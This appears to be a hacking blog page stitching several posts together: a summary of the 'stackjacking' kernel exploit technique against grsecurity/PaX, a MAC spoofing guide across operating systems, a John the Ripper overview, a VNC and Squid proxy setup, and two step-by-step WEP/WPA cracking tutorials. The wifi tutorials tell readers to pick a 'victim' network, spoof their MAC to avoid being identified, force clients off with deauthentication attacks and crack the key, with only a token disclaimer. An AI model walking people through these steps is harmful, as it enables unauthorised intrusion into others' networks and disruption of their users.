Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels.  Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:

• an arbitrary kernel write; and
• a kernel stack memory disclosure

To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:

• Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
• Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
• Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.

For the full details, please see the presentation materials and PoC code:

• Infiltrate 2011 [PDF]
• Hackito Ergo Sum 2011 [PDF]
• PoC Code [GITHUB]

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:

• The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
• The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.

Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

Read More

Spoof MAC Address in Any OS

MAC address (Media Access Control address) is a quasi-unique identifier consists of a six byte number that attached to most network adapter card or network interface card (NIC). As such, all network cards, whether it’s of Ethernet NIC, Gigabit Ethernet NIC or wireless 802.11a/b/g/n WiFi or HiperLAN adapter, should have different MAC addresses, which also known as Ethernet Hardware Address (EHA) or adapter address.

In operating system, MAC address is often represented in 12-digit hexadecimal number. For example, 1A-2B-3C-4D-5E-6F. In practical usage, layer 2 MAC address is converted from layer 3 protocol addresses such as Internet Protocol (IP address) by ARP (Address Resolution Protocol), which then allowed each host to be uniquely identified and frames to be marked for specific hosts on broadcast networks, such as Ethernet. After translated (or when a host on LAN sends its MAC address to another machine which does n ot configured not to accept unrequested ARP replies on the network for preemptive caching), MAC address is cached on source PC ARP table for later use. Content of ARP table on each computer can be viewed by typing arp -a in Windows or arp in Linux. MAC address thus forms the basis of most of the layer 2 networking upon which higher OSI Layer protocols are built to produce complex, functioning networks.
There are many reasons or possibilities that an user may want to change the MAC address or a network adapter, which also known as MAC spoofing. For example, to bypass the MAC address filtering on firewall or router. The trick can be used to get pass the network access restriction by emulating a new unrestricted MAC address, or to gain access connection by spoof an authorized MAC address after sniffing the legitimate MAC address out of the air in MAC filtering Wi-Fi network.
Beside, hackers or enthusiasts also spoofing another host’s MAC address as their own in order to receive traffic packets not meant for them, although ARP poisoning technique is more commonly used. However, changing MAC address can still keep the real information from been detected and logged by various services such as IDS, firewall, DHCP server, wireless access points and etc, and is essential protect user’s privacy. MAC spoofing also potentially trigger a Denial of Service (DoS) attack by causing routing problem with duplicating MAC address exists in the network, especially those similar with gateway and AP router’s BSSID (Basic Service Set Identifier.)
Whatever the reason, it’s pretty easy to change the MAC address or perform MAC spoofing on most of today’s hardware, listed below. Actually, the original MAC address is burnt and imprinted to the network card, and cannot be changed. However, operating system can spoof as if there is different MAC address for the network interface card using tricks below.
Change the MAC address in Windows

1. Go to Start -> Control Panel. Double click on Network Connections (inside Network and Internet Connections category in Windows XP). The, right click on the active network connection with network adapter that you want to change the MAC address (normally Local Area Network or Wireless Network Connection) and click on Properties. Above steps work in Windows XP, Windows 2000 and Windows Server 2003. For Windows Vista, access to NIC’s properties is from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.
   Alternatively, if you already know which network adapter that’s responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double click on the NIC itself.
2. In the General tab, click on the Configure button.
3. Click on Advanced tab.
4. In the Property section, select and highlight Network Address or Locally Administered Address.
5. To the right, “Not Present” radio button is by default selected as value. Change the value by clicking on radio button for Value:, and then type in a new MAC address to assign to the NIC.
   The MAC address consists of 6 pairs of numbers (0 – 9) and characters (A – F) combination. For example, 88-17-E8-90-E2-0A. When entering the new MAC value, omit the dash (-), for example 8817E890E20A.
6. Click OK when done.
7. To verify the change of MAC address, go to command prompt, then type in one of the following commands: ipconfig /all
   net config rdr
   
8. Reboot the computer if successful to make the change effective.

Note: To restore or reset back to original default MAC address, simply set back the option to “Not Present”.
Change the MAC Address of NIC in Windows via Registry

1. Open a command prompt.
2. Type the following command and hit Enter. ipconfig /all
   
3. Record down the Description and the Physical Address (is MAC address) of the active network connection (discard those with Media Disconnected state).
   For example, in figure above, Description is Intel(R) Wireless WiFi Link 4965AGN and MAC address is in the format of 00-XX-XX-XX-XX-XX.
4. In the command prompt also, type the following command and hit Enter. net config rdr
   
5. Record down the GUID for the MAC address for the active connection’s NIC which MAC address to be changed. The GUID is contained within the { and } brackets right in front of the MAC address as shown in figure below.
   
6. Type regedt32 or regedit in Start -> Run box or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.
7. Navigate to the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
   
8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree, and there will be more sub-keys in the form of 0000, 0001, 0002 and so on.
9. Go through each sub-key starting from 0000, look for subkey that has DriverDesc value data that matches NIC description copied from step above, that want its MAC address to be changed. In most cases, it will be similar to the network adapter card name. To verify that the subkey found is indeed a correct one, check the value of the NetCfgInstanceId, which should have the same value with the NIC’s GUID taken from step above.
10. Once a sub-key is matched to the network interface card that MAC address want to be spoofed, select and highlight the subkey. Right click on the sub-key (for example, 0000), then select New -> String Value. Name the new value name as NetworkAddress. Note: If NetworkAddress REG_SZ registry key is already existed in the right pane, skip this step.
11. The double click on NetworkAddress and enter a new MAC address as its value data.
    Note that the 12-digit MAC address in hexadecimal format, and should be entered without any dash (-). For example, 1A2B3C4D5E6F.
12. Reboot the system to make the new MAC address effective. Alternatively, if you don’t want to restart the system, try to disable and then re-enable the network adapter in Device Manager.
13. To verify the change of MAC address, go to command prompt, then type in one of the following commands: ipconfig /all
    net config rdr
    

Note: To restore or reset back to true original hardware burned-in MAC address, remove the NetworkAddress registry key that is been added.
Alternative: Third party tools and utilities to change the MAC address in Windows operating system are plenty, for example: SMAC (direct download link to smac20_setup.ex, supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip, for Windows XP), BMAC (almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link to macmakeup.zip, for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows, directly download MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).
How to Change MAC Address (MAC Spoofing) in Linux and *nix
To change your MAC address in Linux and most Unix-like (*nix) system, run the following script commands:
ifconfig down
ifconfig hw
ifconfig up
For example, the command looks lik “ifconfig eth0 down hw ether 1A:2B:3C:4D:5E:6F”. First command brings down the network interface, second command change its MAC address while third command bring up the interface again. Note that in some cases, to bring down and bring up the network interface, the following commands have to be used:
/etc/init.d/networking stop or /etc/init.d/network stop (in the case of Fedora Core 5)
/etc/init.d/networking start or /etc/init.d/network stop (in the case of Fedora Core 5)
Alternatively, for Fedora Code 5 Linux with Iproute2 tools installed, the following commands also can change the MAC address to spoofed version:
/etc/init.d/network stop
ip link set address 1A:2B:3C:4D:5E:6F
/etc/init.d/network start
For example, “ip link set eth0 address 1A:2B:3C:4D:5E:6F”. To check whether the MAC address has been spoofed, use ip link ls eth0 or ip addr ls eth0 instead of using ifconfig eth0.
How to Make the Spoofed MAC Address Permanently Even After Reboot in Linux
Edit the ifcfg-eth0 file (or other similar file if you’re changing different interface), add the following variable line to the file:
MACADDR=12:34:56:78:90:ab
Then run service network restart to make the change effective immediately.
How to Make the Spoofed MAC Address Permanently on Restart in Debian
Edit the /etc/network/interfaces file and add in the following variable line to the appropriate section so that the MAC address is set when the network device is started.
hwaddress 02:01:02:03:04:08
For example, “hwaddress ether 02:01:02:03:04:08″.
Alternative: GNU Mac Changer (for Debian, Slackware, ArchLinux, Mandrake, Crux and other RPM-based distributions such as Fedora, Red Hat, CentOS, ASPLinux, SUSE Linux, OpenSUSE and etc.
How to Change MAC Address (MAC Spoofing) in BSD or FreeBSD
Issue the following commands in shell:
ifconfig down
ifconfig
ifconfig up
First command brings down the network interface (optional), second command change its MAC address while third command bring up the interface again (optional). For example, the command looks lik “ifconfig xl0 link 1A:2B:3C:4D:5E:6F” or “ifconfig fxp0 ether 1A:2B:3C:4D:5E:6F”
How to Change MAC address in Solaris
The shell command to change the MAC address in Sun Solaris is as below:
ifconfig
For example, the command looks like “ifconfig hme0 ether 1A:2B:3C:4D:5E:6F”. Note that the change is temporary that does not persist after a reboot. To make this change permanent, the command can be placed in a runtime control script (/sbin/sh).
How to Spoof MAC Address in HP-UX
It’s possible to change MAC address using HP-UX SAM. Select Networking and Communications, then selecting the interface, then click on Action -> Modify -> Advanced Options. Finally, change the value of station address, which is MAC address name in HP-UX.
How to Spoof and Change MAC Address in OpenBSD
Use the following command to change MAC Address to spoofed MAC in OpenBSD (after version 3.8):
ifconfig lladdr
For example, “ifconfig bge3 lladdr 1A:2B:3C:4D:5E:6F”.
How to Change to Spoofed MAC Address Permanently in OpenBSD
To make the MAC address changed at boot before network connection is established, and even before parsing of hostname.* file, edit the /etc/netstart file to add in the following lines before the line of “# Now parse the hostname.* file”:
if [ "$if" = "INTERFACE" ]; then
ifconfig lladdr
fi
# Now parse the hostname.* file
....
How to Change MAC Address in Mac OS X
Since Mac OS X 10.4.x (Darwin 8.x) onwards, the MAC address of wired Ethernet interface can be altered in Apple Mac OS X in a fashion similar to the Linux and FreeBSD methods. To do so, type the following command in Terminal.app:
sudo ifconfig en0 ether aa:bb:cc:dd:ee:ff
or
sudo ifconfig en0 lladdr aa:bb:cc:dd:ee:ff (for Mac OS X 10.5 Leopard)
where en0 is the network interface (numbered from en0, en1, en2 …) and aa:bb:cc:dd:ee:ff is the desired MAC address in hex notation.
Alternative: MacDaddy (download MacDaddyX.dmg, support Airport wireless adapter)
Thanks To www.mydigitallife.info

Read More

Hacking Tool: John the Ripper: Crack Password

Re: Hacking Tool: John the Ripper

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free
• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

Read More

Configuring VNC-SERVER And Squid Proxy Server in CentOS

Configuring VNC-SERVER And Squid Proxy Server in CentOS (32 & 64) based VPS
Installing GUI based Gnome-Desktop, squid, vnc, vnc-server, firefox in centos based VPS
NOTE :-

# stands for comment
$ denotes sshell commands

1st. Open SSH of your VPS with your Favorite SSH client.

2nd. In Shell Prompt >_ Write commands as described below.

Code:

$ yum update -y

Phase of Installing All Products...

Code:

$ yum groupinstall gnome-desktop -y

# This will install 4 apps at once !
# 1 squid is advance proxy server
# 2 vnc is vnc viewer client
# 3 vnc-server is VNC server to operate remove computer's GUI interface of gnome from your desk.
# 4 firefox will unlease speed of internet as it is installed in VPS !

Code:

$ yum install squid vnc vnc-server firefox -y

# Configuring VNC-SERVER in CentOS based VPS....

# Set Your VNC Password For login..

Code:

$ vncpasswd

# Start vncserver to generate default config files...

Code:

$ vncserver

# As files are generated, we need to terminate vnc process(s) in order to make custom gnome configs..

Code:

$ pkill vncserver
$ pkill Xvnc
$ reboot

# Add gnome based configuration in this FILE via 'vi' editor..
# -To Edit Or Insert Text in vi editor Press 'i'
# -To Save Modified File Press 'Esc' > ':wq'
# -To Quit With-Out Saving 'Esc' > ':q!'
# -To break vi process 'Ctrl + C'

Code:

$ vi ~/.vnc/xstartup

# Add below code into file 'xstartup'
-- CUT - PASTE--

PHP Code:

#!/bin/sh
  ( while true; do xterm; done ) &
  # Uncomment the following two lines for normal desktop: unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc
  [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic & xterm -geometry 1024x768 -ls -name "$VNCDESKTOP Desktop" & gnome-session & 

-- CUT PASTE--




# To auto-start vnc server each time system boot.

Code:

$ chkconfig vncserver on

# To start vnc-server at a time.

Code:

$ service vncserver start

Now open vnc-viewer in your desktop and give IP of vps with :1
i.e 42.23.1.4:1
where :1 is port 5901 by default used by vnc-server in linux


# Configuring Squid Proxy Server in CentOS (32 & 64) based VPS....



# Switch to squid directory

Code:

$ cd /etc/squid

# move default squid configuration as a backup file !

Code:

$ mv squid.conf squid.conf.backup

# Receive Pre-made squid.conf file..

Code:

$ wget http://pastebin.com/download.php?i=Y8j35JS9 --output-document=/etc/squid/squid.conf

-- NOTE | Caution --
Change directives like mentioned below for confort !
.
.
.

# Change the default port 3128 to 8080 or 80 ! as per your need.

Code:

http_port 3128

# Check ur ip > tracemyip.org
# You should add your own range to get access to proxy server Or else it will show unauthorised access...

Code:

acl range_airtel src 122.0.0.0/255.0.0.0

...

http_access allow range_airtel

i.e.

Code:

acl range_US src 209.0.0.0/255.0.0.0

...

http_access allow range_US

.
.
-- End of NOTE | Caution --
_


# Make SQUID as service AS it should start at system-start (boot time)

Code:

$ chkconfig squid on

# Starting squid proxy server

Code:

$ service squid start

# Cross-Verify listening post via below command

Code:

$ netstat -tulpn | grep 3128

open your browser & set proxy IP & PORT in your browser & Bingo!
i.e IP: 42.23.1.4 Port: 3128
Thanks To aa-Numb
> For Educational Purpose Only !

Read More

Beginners Guide To Hacking Wireless Networks

Hacking WEP wifi passwords
Basic Entry into a WEP Encrypted Network

This Tutorial explains EVERYTHING in detail So, it is quite long. Enjoy.

1. Getting the right tools
This Tutorial is in Bt3 But Download The Latest Release Bt4.

Download Backtrack 4. It can be found here:

http://www.backtrack-linux.org/downloads/

 I downloaded the Dvd iso and burned it to a Dvd. Insert your BT4 Dvd/usb drive and reboot your computer into BT4. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the slave network for attack

Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down ctrl and type c

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay1.jpg

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay2.jpg

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

http://i574.photobucket.com/albums/ss184...crack1.jpg

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Hacking WEP wifi passwords
By Sarvesh

Read More

How To Hack WEP/WPA With Linux

Background

I noticed a strange behaviour. A lot of people were into cracking WEP, but still had a lot of questions on WPA. After these findings, I decided to just write my own tutorial :-)
Knowledge
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is, that if the password is in some sort of dictionary, the password can be cracked. you'll need a 4-way handshake from a client connecting to an AP. The 4way handshake holds an encrypted algorithm which can be cracked by dictionary attack. you'll need a huge list and some luck that the password is in the list, or you can make a personal list created with a password tool of your choice (like john), which will not be discussed in this tutorial ;-).For this tutorial, of course I'll be using the Aircrack-ng suite.
Optional: lazyness

sudo su

you might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you could use this optional command.
knowing what interface to use
first of all, you'll have to know what the name of your wireless interface is, thats why you type:

iwconfig

Identifying your victim

airmon-ng start interface

you'd get a small message saying: (monitor mode enabled on [i]spoofedinterface[/i] ) //In my case, interface was "mon0"..

airodump-ng spoofedinterface

The next step would be choosing your victim. Obviously we would be looking for someone with wpa encryption now. since you want to crack someone with wpa. write down his BSSID and his CHANNEL.
rebooting the network card to fit in the right Channel

airmon-ng stop spoofedinterfacew

airmon-ng start interface CHANNEL

Start the dumping of the file

airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface

this will start airodump-ng on your specific channel (-c). It will search handshakes of the specifief bssid and will write this all to a capture file named psk (-w).
Notice! You might ask yourself, but how do I know when I captured a handshake? -> Well, aircrack thought of that, if you managed to capture a handshake, a message appears in the upper right corner.
Optional!, but very helpful when speeding up the process
So you need to capture a handshake, but the people who are connected of course won't be giving out the handshake, since this event only takes place during authentication. If we could just boot them for a small second off their network, so they could reconnect, that would be perfect!

aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofed interface

This would do 10 "deauthentication" attacks (-0) with the AP being BSSID and client being booted CLIENTBSSID. You can check if a client is connected by looking at your Airodump-ng screen again. If you see on the bottom of that screen that someone is connected to the ESSID of your victim, simply use the STATION BSSID as CLIENTBSSID in this example.

aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap

This would crack the actual capture file that was being created by airodump-ng. notice! You can only try to crack when a handshake actually took place. Don't forget, -w needs the path to your wordlist, so remember where you saved it!
Optional security
As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your mac.. Try to implement it yourself ;-)

sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && ifconfig spoofedinterface up

Wordlists
If you ever needed some good wordlists, I suggest checking here first: wordlists
Qkyrie

Read More